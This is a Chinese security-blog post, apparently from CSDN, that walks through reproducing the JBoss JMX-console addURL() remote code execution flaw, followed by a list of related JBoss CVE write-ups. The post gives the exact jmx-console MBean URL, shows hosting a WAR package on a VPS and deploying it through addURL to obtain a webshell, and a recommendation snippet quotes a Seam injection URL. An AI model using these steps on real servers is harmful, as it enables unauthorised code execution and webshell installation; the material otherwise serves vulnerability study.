JBOSS远程代码执行

最新推荐文章于 2024-08-06 22:46:22 发布
最新推荐文章于 2024-08-06 22:46:22 发布
阅读量876 收藏 1
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: web安全 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jd_cx/article/details/123833417

0x00漏洞介绍

JBOSS默认配置会有一个后台漏洞,漏洞发生在jboss.deployment命名空间,中的addURL()函数,该函数可以远程下载一个war压缩包并解压。如果压缩包里含有webshell文件,是直接可以解析的。

0x01 漏洞复现

http://192.200.30.43:8081/jmx-console/

找到业务部署的入口,通过addurl,进行远程war包部署,访问地址:http://192.200.30.43:8081/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL

 

 

vps上起http server,放置war包,http://x.x.x.x:8008/info.war

填入paramvalue,点击invoke进行部署 

 成功部署info.war包

获取webshell

 

 

 

复现nuclei——CVE-2017-12149(JBOSS反序列化远程代码执行漏洞)
记录并分享学习安全的知识点..
01-26 1400
一、漏洞介绍 JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。在/invoker/readonly路径下,攻击者可以构造序列化代码传入服务器进行反序列化,由于没有对反序列化操作进行任何检测,导致攻击者可以执行任意代码。 影响版本:JBoss 5.x / 6.x 访问:​http://x.x.x.x/invoker/readonly​ 可以看到是返回 500,一般漏洞就是存在了。 二、nuclei扫描结果 三、漏洞复现 (一)通过JavaD.
[ vulhub漏洞复现篇 ] JBOSS AS 4.x以下反序列化远程代码执行漏洞CVE-2017-7504
qq_51577576的博客
09-01 1215
JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。
Jboss多个远程命令执行漏洞(CVE-2017-12149、CVE-2015-7501、CVE-2017-7504)
qq_68163788的博客
06-26 1684
JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss广为流行。
浅谈“Jboss远程代码执行
→_→
07-23 1403
一:漏洞名称: Jboss远程代码执行, Jboss远程命令执行 描述: JBOSS默认配置会有一个后台漏洞,漏洞发生在jboss.deployment命名空间,中的addURL()函数,该函数可以远程下载一个war压缩包并解压。 如果压缩包里含有webshell文件,是直接可以解析的。 检测条件: 被测网站采用了JBOSS中间件架构 检测方法: 对于采用JBOSS的网站,首先判断其版本,如果版本为1.0.x版本,则可通过对其控制台的访问来判断,访问http://127.0.
JBOSS远程代码执行漏洞
Java web 开发专栏
01-09 921
JBOSS默认配置会有一个后台漏洞,漏洞发生在jboss.deployment命名空间中的addURL()函数,该函数可以远程下载一个war压缩包并解压访问http://www.safe3.com.cn:8080/jmx-console/ 后台,如下图下拉找到如下图所示点击flavor=URL,type=DeploymentScanner进入在输入框中写入war压缩
(五)vulhub专栏:Jboss远程代码执行漏洞复现
云舒的博客
07-13 705
Jboss远程代码执行 CVE-2017-12149 CVE-2017-7504
Struts2及jboss漏洞利用工具
08-06
S2-016(CVE-2012-6120)则是另一个远程代码执行漏洞,它允许攻击者通过上传恶意的Action配置文件来执行恶意代码。这些漏洞的存在使得Struts2成为了黑客的目标,因此,定期更新Struts2到最新版本以修复已知的安全...
Apache tomcat远程代码执行验证代码
04-16
远程代码执行(RCE)是一种严重的安全风险,它允许攻击者在目标系统的上下文中运行自定义代码。在Apache Tomcat的上下文中,这可能意味着攻击者可以获取服务器的完全控制,包括读取、修改或删除敏感数据,安装后门,...
常见中间件漏洞复现之【Jboss】!
最新发布
muyuchen110的博客
08-06 1136
Jboss介绍JBoss是⼀个基于J2EE的开发源代码的应⽤服务器。JBoss代码遵循LGPL许可,可以在任何商业应⽤中免费使⽤。JBoss是⼀个管理EJB的容器和服务器,⽀持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核⼼服务不包括⽀持servlet/JSP的WEB容器,⼀般与Tomcat或Jetty绑定使⽤。在J2EE应⽤服务器领域,JBoss是发展最为迅速应⽤服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss⼴为流⾏。漏洞介绍影响范围。
Jboss反序列化远程代码执行漏洞(CVE-2017-12149)
weixin_46411728的博客
08-28 1853
Jboss反序列化远程代码执行漏洞(CVE-2017-12149)
JBoss远程代码调试配置说明
07-03
在测试过程中如果出现程序bug问题,但又不知道什么原因时,我们可以考虑使用eclipse的远程debug调试功能,这样我们就可以在本地跟踪实际代码,来一步一步的追踪出现问题的地方。
jboss linux 远程调试,JBoss EAP 6将单个服务器配置为在域模式下进行远程调试
weixin_28668743的博客
05-07 120
JHollanti也许您缺少允许远程调试的一些编译器标志(如“ lines,vars,source”).例如,如果您正在使用Ant,则需要将此行添加到javac中:然后在执行脚本中添加以下内容:另一方面,如果您使用的是Maven,则可以在中添加相同的标志,如下所示:org.apache.maven.pluginsmaven-compiler-plugin2.0.2truelines,vars,so...
jboss seam 远程执行漏洞利用步骤
cnbird's blog
12-15 2850
目标:http://www.ip.com http://ip.com/welcome.seam?pwned=java.lang.UNIXProcess%4011b30c7&cid=73478 http://ip.com/home.seam?actionOutcome=/webcome.xhtml%3fpwned%3d%23{expressions.getClass().forName ('j
[ vulhub漏洞复现篇 ] JBOSS AS 5.x/6.x反序列化远程代码执行漏洞CVE-2017-12149
qq_51577576的博客
08-31 1196
JBOSS AS 5.x/6.x反序列化远程代码执行漏洞CVE-2017-12149 该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。...
智能一代云平台(十):Jboss远程访问流程总结
热门推荐
通往精英的成长之路
02-05 1万+
【前言】 最近在做一个EJB相关的项目,在做的过程用到了远程调用的相关东西,自己进行一下梳理和总结,在此与大家分享。 【相关流程】 一、对EJB和Jboss两者梳理: 1、小感:大多数情况下,提到两者中的一者,就会提起另一者;刚开始的时候自己也是对这两个东西比较混淆,最近在项目中用出了些问题,自己查找资料将其梳理一下,原来一些模糊的地方逐渐清晰起来...
Jboss 常见的几种漏洞
网安小白
08-06 878
这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了⽤户传⼊的对象, 然后我们利⽤Apache Commons Collections中的 Gadget 执⾏任意代码JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的 HTTPServerILServlet.java⽂件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利⽤该漏洞执⾏ 任意代码执⾏。
Jboss远程调试教程:启动参数与Eclipse配置
Jboss远程调试是一种常见的运维任务,特别是在分布式系统或大型企业环境中,开发者可能需要对服务器上的应用程序进行实时监控和调试。本文将详细介绍如何在Jboss服务器上设置并使用远程调试功能,以便于在开发过程中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值